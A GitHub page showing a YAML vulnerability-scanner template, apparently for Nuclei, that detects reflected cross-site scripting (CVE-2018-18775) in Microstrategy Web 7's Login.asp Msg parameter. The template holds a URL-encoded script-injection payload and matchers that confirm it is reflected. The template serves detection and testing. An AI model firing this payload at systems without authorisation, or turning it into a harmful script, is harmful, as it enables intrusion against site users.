-
Notifications
You must be signed in to change notification settings - Fork 221
/
CVE-2018-18775.yaml
34 lines (30 loc) · 1.01 KB
/
CVE-2018-18775.yaml
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
id: CVE-2018-18775
info:
name: Cross Site Scripting in Microstrategy Web version 7
author: 0x_Akoko
description: Microstrategy Web, version 7, does not sufficiently encode user-controlled inputs, resulting in a Cross-Site Scripting (XSS) vulnerability via the Login.asp Msg parameter
severity: medium
tags: cve,cve2018,microstrategy,xss
reference: https://www.exploit-db.com/exploits/45755
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.10
cve-id: CVE-2018-18775
cwe-id: CWE-79
requests:
- method: GET
path:
- '{{BaseURL}}/microstrategy7/Login.asp?Server=Server001&Project=Project001&Port=0&Uid=Uid001&Msg=%22%3E%3Cscript%3Ealert(/{{randstr}}/)%3B%3C%2Fscript%3E%3C'
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- '"><script>alert(/{{randstr}}/);</script>'
part: body
- type: word
words:
- "text/html"
part: header